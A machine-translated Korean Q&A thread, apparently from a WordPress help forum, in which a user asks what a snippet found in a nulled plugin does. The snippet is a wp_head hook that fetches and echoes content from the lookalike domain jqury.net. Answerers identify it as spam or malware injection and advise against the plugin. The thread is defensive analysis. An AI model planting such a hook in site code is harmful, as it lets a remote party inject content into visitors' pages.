나는 이것을 플러그인에서 발견했다. 무엇을합니까? 위험한가요?


17

나는 이것을 플러그인에서 발견했다. 무엇을합니까? 위험한가요?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

5
어떤 플러그인입니까?
Daniel

공식 WP 사이트에서 플러그인을 받았습니까?
그 브라질 사람

1
이것은 내 고객 중 하나가 플러그인으로 네트워크 설치를 실행하기를 원했습니다. 플러그인은 wp-admin에서 이것을 실행하려고했습니다. 이것을 읽은 후 나는 그것이 어디서 왔는지 물었다. 토런트의 null 플러그인입니다. 짧은 대답은 erm NO xXx였습니다.
Sofia Rose

답변:


16

http://jquery.com/jQuery에서 사용 하는 도메인의 철자가 틀린 도메인에서 스팸을 포함하는 마크 업 블록을로드합니다 (소스를 게시하는 방법에 대해 생각했지만 내용을 광고하고 싶지는 않습니다). 유명하고 인기있는 Javascript 라이브러리이며 WordPress에 Core에 포함되어 있습니다. 실제로는 매우 다른 것을로드 할 때 그 라이브러리를로드하는 것으로 생각됩니다.

그리고 다른 방법으로 jQuery를로드하는 것처럼 보입니다. 변수 이름을 주목하십시오 $jquery.

악의적 인 스크립트를로드하려고 시도 할 수도 있습니다. 나는 확인하지 않았다. 나는 것입니다 해당 페이지의 내용이 언제 컨트롤러가 기분이 도메인을 변경할 수 있습니다 특히 이후 확실히 위험 호출합니다.

스팸이 퍼지는 사이트를 검색 엔진에서 찾아 보면 사이트가 손상 될 수 있습니다.

사용하지 마십시오. 사이트를 운영하는 사람 이외의 다른 웹 사용자 나 귀하에게는 도움이되지 않습니다. 평판이 좋은 사이트에서이 사실을 발견하면 해당 사이트에보고하십시오.


7

예, 스팸 사이트에서 콘텐츠를로드하는 것은 위험한 코드입니다.

플러그인의 이름은 지정하지 않았지만 웹 사이트에이 코드를 설치 한 후이 코드를 찾았다면 플러그인 코드는 이와 같은 개발자가 아니라 설치 후 해킹되었을 수 있습니다. 이 경우이 플러그인보다 더 많은 웹 사이트에서 악성 코드를 찾을 수 있습니다.

원래 플러그인이있는 곳에서 다운로드 한 플러그인 코드를 확인하고이 악성 코드가 원래 있던지 확인하십시오. 그렇지 않은 경우 사이트가 해킹 된 것입니다. 그러한 경우라고 판단 되면 Codex에서이 기사를 읽으십시오 .


3
이것은 내 고객 중 하나가 플러그인으로 네트워크 설치를 실행하기를 원했습니다. 플러그인은 wp-admin에서 이것을 실행하려고했습니다. 이것을 읽은 후 나는 그것이 어디서 왔는지 물었다. 토런트의 null 플러그인입니다. 짧은 대답은 erm NO xXx였습니다.
Sofia Rose
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.